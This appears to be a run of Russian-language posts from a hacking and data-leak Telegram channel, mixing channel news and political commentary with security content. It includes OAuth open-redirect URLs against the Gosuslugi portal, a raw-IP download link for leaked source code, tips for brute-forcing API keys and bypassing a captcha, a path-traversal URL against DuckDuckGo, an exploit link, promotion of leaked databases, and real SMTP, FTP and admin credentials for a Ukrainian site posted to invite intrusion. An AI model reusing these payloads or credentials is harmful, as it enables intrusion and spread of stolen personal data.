Спустя столь долгое время мы все таки восстановили работоспособность бота @iptools_robot!

Прошло конечно, много времени, 2ого октября даже заблокировали канал и чат BIN, но тоже уже восстановлены по новой ссылке @hashb1n.

Все, кто имел годовую премиум подписку, пожалуйста отпишите в Нашел баг?, я проверю вас по базе.

Исследователи выявили на портале Госуслуг еще две уязвимости, связанные с использованием Covert Redirect (скрытой переадресации). Важным отличием выявленных уязвимостей является возможность перехвата cookie-файлов при помощи технологии XSS (SSRF). Это позволяет злоумышленникам не только перенаправлять своих жертв на вредоносный ресурс, но и получать доступ к тем социальным аккаунтам, которые авторизованы в их браузере.

https://esia.gosuslugi.ru/aas/oauth2/ac?response_type=code&client_id={данные по запросу}&redirect_uri=http://gosulsug.ru/login/

https://esia.gosuslugi.ru/aas/oauth2/ac?response_type=code&client_id={данные по запросу}&redirect_uri=mailto:yourname@domain.com

Источник @tomhunter

https://tgscan.github.io/ru-osint-infosec-map

Неплохо, однако)
В скором времени буду возрождать проект, как выйдет в продакшен одна из моих потусторонних компаний.

Пост о хакере по жизни.
Не могу промолчать.

😒 Стало известно, что основатель WikiLeaks Джулиан Ассанж перенес инсульт в британской тюрьме строгого режима Белмарш ещё в октябре.
А недавно, 10 декабря лондОнский суд разрешил экстрадировать его в США.
Собственно, ничего удивительного в этом и нет, если кто-то вообще рассчитывал на нормальный исход.

✅ Там Ассанжа засудят так, что Протасевичу и не снилось.
Как обычно, наши пиздатые журналисты из самых правдивых СМИ на свете отметятся (или уже отметились) двумя позорными абзацами и ни одного плохого слова не напишут о сияющем бастионе прав человека. Ой хуле я доебался 😆.

✅ А между тем, Дж. Ассанжа под соусом неоднозначности его личности обвиняют за:
- "Дневники афганской войны" и "Иракское досье";
- Изнасилование активистки Викиликс;
- Сотрудничество с Russia Today, Россией и лично Путиным;
- Способствование избранию на пост президента США Д. Трампа;
- Связь с "Анонимусами".

Ёпт, а что ты сделал для хип-хопа в свои годы???
Это ли не политика двойных стандартов во всей красе???

Если ты Протасевич, Венедиктов, Навальный, то ты борец с тиранией, за свободу, демократию и права человека, а если ты Ассанж, то ты террорист 🤦🏻‍♂

Всем добра, жители матрицы.
Не протекайте 🖥💦

🌐 Агрегатор утечек @data1eaks

Завтра будем обзирать недавний слив парсинга LinkedIn по косточкам.

Утечка исходных данных ГОСУСЛУГ

Данные утекли из директории .git, на серверах были неправильно настроены права доступа, тем не менее это все же утечка.

Ниже привел способы настройки прав для .git и других каталогов. Такая же проблема может возникнуть и при использовании .svn.

Исправление для Nginx
location ~ /\.git {
deny all;
}

Исправление для Apache
RedirectMatch 403 /\.git

Скачать — 179.43.176.87:420/gosuslugi.pnzreg.ru.rar

Достаточно интересное обновление вышло в нашем любимом Telegram

Постепенно, с каждым нововведением выселяют ботов монополистов, на этот раз реакции.

Функция в чатах и каналах по умолчанию недоступна.

Если вам понравился контент дважды нажмите на пост ❤️

Есть такой интересный сервис скриншотов с подпиской — screenshotmachine.com

В нем мы нашли несколько крупных недочётов, которые могут вам пригодиться в ваших проектах и просто, как интересная информация.

1. Ключи API у каждого пользователя всего 6 символов, большая возможность перебрать и найти ключ с платной подпиской для скриншотов, скорее всего платную подписку выдаст отличающийся от остальных других IP сервера

2. Очень простая капча, которую можно распарсить небольшим Python-скриптом. (что мы и сделали)

3. Нет детекта temp-mail и вообще подтверждения по email.

4. Самое грандиозное, не нужно никаких API, есть торчащий endpoint для скриншотов:

POST https://www.screenshotmachine.com/capture.php

url=ВАШ_URL&device=desktop&width=1920&height=1080&zoom=100&format=png&timeout=2000&click=&hide=&cacheLimit=0

Получаем сессию (на каждый скриншот новую) и с ней отправляемся получать скриншот к следующей странице:

https://www.screenshotmachine.com/serve.php?file=result

@EmailPhoneOSINT_bot стукнуло 4 месяца, мне кажется стоит поддержать данный замечательный проект, хотя бы высокой нагрузкой на бота 🧐

Конечно не все так замечательно, как и хотелось бы. Я знаю, что администратор бота меня сейчас читает и наконец, сделает нормальное определение email / номера регуляркой сразу по всем форматам, а не кнопками.

Не помешало бы убрать снижение количества запросов за ложные срабатывания (неправильный формат или вовсе другой текст).

Не стоит забывать и про @iptools_robot!

Масштабная утечка исходных данных украинского портала «‎Дия»

Источником утечки является один из пользователей многим известного форума RaidForums.

По словам автора, утечка содержит исходный код государственного сайта. Сам я еще не смотрел, но скоро буду.

source: @hashbin

Напоминаю, что у нашего сообщества есть комфортный чат — t.me/+Rn-nPaEe_vkzYmRi

Почему-то именно с поиском чата у людей возникают проблемы 🤦‍♀️

Также, главный администратор @hexuary клиентов в наш эксклюзивный приватный канал, который в скором времени будет неплохо пополнен.

Эксплоит CVE-2021-4034 — github.com/berdav/CVE-2021-4034

Уязвимость заключается в локальном повышение привилегий на машине под управлением Debian и части основанных на ней дистрибутивов. Недочет скрывается в приложении polkit-pkexec, которое является инструментом setuid и позволяет обычным пользователям выполнять команды от имени привилегированных с предопределенными политиками.

Информация об уязвимости появилась вчера (25.01.2022), часть фиксов уже выпущена.

Обстановка в мире конечно не очень, но Тинькофф..

Еще вчера курс на покупку доллара был равен 84 рублям, пару часов назад он поднялся аж до 99 рублей, а сейчас он и вовсе 154 рубля.

Представьте, покупка доллара — 154р, евро — 165р, а на продажу 83 и 93 рубля соответственно...

Да ладно курсы, у меня все и так в долларах, но конкретно я был удивлен, когда увидел то, что творится с Тиньковом. Нельзя нормально снять наличные, а перевод между валютами в приложении и вовсе заблокирован!

На скриншоте можно наблюдать, что нет курса при конвертации, а второе поле равно нулю, press F владельцам Тинькофф и мне.

Единственная информации о ситуации, которую я нашел. Напоминаю, на Тинькофф не были наложены санкции.

А вот и я.. Прилетел с Тайланда обратно в Магадан.

За время, пока меня не было произошло несколько крупных утечек и без меня 🙃 Кто имеет какую нибудь из этих утечек – милости прошу в чат, а я сам вас найду.

«2 берега» – 10,4 миллионов строк
«Гемотест» – 30,5 миллионов строк
«Paysystem.tech» – якобы утечка QIWI, хотя сама база наверняка не более, чем просто обогащенная база номеров
«Суши Мастер» – минимум 1,3 миллиона строк
«Ykt.ru» – буквально недавно и тоже на 1,3 миллиона строк
«Fotostrana.ru» – тут только 800 тысяч, но тоже прикольно
«RaidForums» – приношу глубокие соболезнования данному проекту, поглубже, чем бутылка в заднице владельца

Не знаю чем вас порадовать, пишите в комментарии, что вы хотите, а я вам подыщу чего нить :)

Я уже не раз говорил про очень интересного бота – @acunetix_robot, который позволяет сканировать любой сайт на уязвимости.

В боте используется программное обеспечение Acunetix, цена на который варьируются от 4,500$ и до бесконечности, тем временем в @acunetix_robot одно полное сканирование любого сайта обойдется вам всего в 30 рублей.

На выходе, как и полагается, у вас будет красиво оформленный PDF-файл с отчетом. На одном таком сканировании можно найти множество уязвимостей и заработать на программе Bug Bounty. (или продать)

#не_реклама_а_благотворительность ❤️

В продолжение об утечке russkoe-slovo.ru, о которой писал @data1eaks

На одном из форумов, как уже обговаривалось, был выложен фазнутый лог ошибок, содержащий огромное количество пользовательских данных и информации о заказах (на скриншоте пример с поломанной кодировкой, но спокойно можно различить, что имеется адрес, номер, почта, стоимость заказа и так далее)

Пока я в кой то веке решил уведомить компанию о таком разочаровании я наткнулcя еще и на russkoe-slovo.ru/.git/config при поверхностном осмотре. 🤦🏻‍♂️

Вам не хочется плакать, осознавая то, что информационная безопасность настолько ужасно развита? Это уже далеко не первый сайт, который закрыл .git, но не закрыл каталог, блять...

UPD: Данные от 31 августа 2018г по 19 ноября 2019г, более года все это логировалось..

UPD2: Это лог данных заказов, которые отправлялись через api.grastin.ru (полагаю служба доставки и тоже не блещет безопасностью)

channel: @hashbin2

В DuckDuckGo найдена до сих пор активная LFI

Довольно интересный артефакт, теперь дружно идем тестировать.

Но что-то мне подсказывает ничего особо интересного тут найдено не будет 🌚

https://duckduckgo.com/?kad=../../../../../../../../../../usr/share/doc/openssh-client/faq

source: @anarchy_squad
channel: @hashbin2

Смешнее вы сегодня ничего не увидите...

Украинский сервис nexus.ua в качестве почтового ящика использует заблокированный у них же Yandex.ru, в качестве доказательств выкладываю все данные с их сервера.

Заходите – играйте, на самом сервисе ничего интересного, кроме моего красивого поста нет, да прибудет актив на забытый народом сайт.

SMTP
public $smtpuser = 'nexus.ua.2016@yandex.ru';
public $smtppass = 'aXdWtOhXLb';
public $smtphost = 'smtp.yandex.ru';
public $smtpsecure = 'ssl';
public $smtpport = '465';

FTP
public $ftp_host = '185.67.1.56';
public $ftp_port = '21';
public $ftp_user = 'nexus';
public $ftp_pass = 'rM97FaLt';

nexus.ua/administrator
admin:hashbin
nexus:nexus

UPD:
быстро вы, помянем.

Приветствую, дорогие читатели!

За последнее время, даже с тех пор как я вернулся в это прекрасное место вы могли заметить то, что постов очень мало. Раньше я понимал свою аудиторию и не было войны, из-за которой в комментариях некоторые индивиды устраивают баталии.

Взять в пример прошлый пост, после которого в мою сторону полилось огромное количество агрессии от Украинского народа (вплане Русско-Украинских отношений я держу нейтралитет). Раньше бы никто и слова не сказал, увидев подобный развлекательный контент.

Я бы хотел выяснить, что ж вам интересно? У меня несколько вариантов, но я понимаю, что люди тут совершенно разных интересов. Кому-то базы и только базы подавай, кому-то таргеты открытые, а кому-то интересное из КБ.

channel: @hashbin2 (там же и ссылка на чат)

ℹ️ Сегодня канал "Утечки информации" (@dataleak) попал в примерно такую же ситуацию, как и наш канал не так давно (когда совершенно необоснованно нам повесили плашку SCAM по ошибочной жалобе, которую администрация мессенджера без сомнений, не разбираясь в ситуации, исполнила).

🤦🏻‍♂ А именно, столкнулся с безобразной модерацией или фактически цензурой со стороны Telegram, опять же, по непонятной жалобе непонятных юристов - борцунов непонятно с чем. Из канала без предупреждения (как это принято в Телеге) был удалён пост об утечке персональных данных клиентов "GeekBrains" за "нарушение копирайта".

✅ То ли англоязычные модераторы "не алё", то ли это такая политика мессенджера в отношении каналов ИБ-тематики? Любой может придумать жалобу, приправить её серьезными словами, не забыть написать в ней "нарушение авторских прав" или "нарушения копирайта", дать ссылку на свою страницу в сети (на которой модератор Telegram будет единственным посетителем за сутки, так как до него она никому была не интересна) и вуаля.

❌ Уверяю вас, что обжалованию решение модерации не подлежит, т.к. у вас не получится достучаться до поддержки и построить диалог, это я вам гарантирую, проверено на собственном опыте.

❗️Владельцы каналов ИБ-тематики и просто всем, кому не безразлична такая ситуация, прошу сделать максимальное распространение с тем, чтобы привлечь внимание к этой имеющей место быть "проблеме". В противном случае, следующим пострадавшим окажетесь вы.

🌐 Агрегатор утечек @data1eaks
Не протекайте, друзья 🖥💦